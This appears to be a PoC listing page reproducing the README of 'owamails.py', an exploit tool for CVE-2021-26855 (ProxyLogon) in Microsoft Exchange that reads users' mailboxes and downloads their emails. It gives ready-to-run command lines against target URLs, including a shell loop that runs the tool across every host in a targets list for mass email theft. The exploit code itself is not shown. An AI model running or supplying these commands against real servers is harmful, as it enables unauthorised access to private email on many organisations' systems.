CVE-2021-26855 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Source

Associated Vulnerability

Readme

**Basic usage: `python owamails.py -u <url> -l <users.txt> -p <path>`**

**optional arguments:**
```
  -h, --help            show this help message and exit
  -u URL, --url URL     Url, provide schema and not final / (eg
                        https://example.org)
  -l LIST, --list LIST  Users mailbox list
  -p PATH, --path PATH  Path to write emails in xml format
  -f FQDN, --fqdn FQDN  FQDN
  -d DOMAIN, --domain DOMAIN
                        Domain to check mailboxes (eg if .local dont work)
```




**Check email boxes and download emails**

basic:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads`

don't get domain from headers:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local`

don't get FQDN from headers:

`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01`


massive?:

`for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;`

**References:**
- https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/how-to-work-with-exchange-mailbox-items-by-using-ews-in-exchange
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

**fork form:**  
https://gitlab.com/gvillegas/ohwaa/

File Snapshot

 [4.0K]  /data/pocs/b90ec378312342f8227d111aa2f8d7767bcdf475
├── [9.4K]  owamails.py
├── [1.3K]  README.md
└── [ 115]  users.txt

0 directories, 3 files

Remarks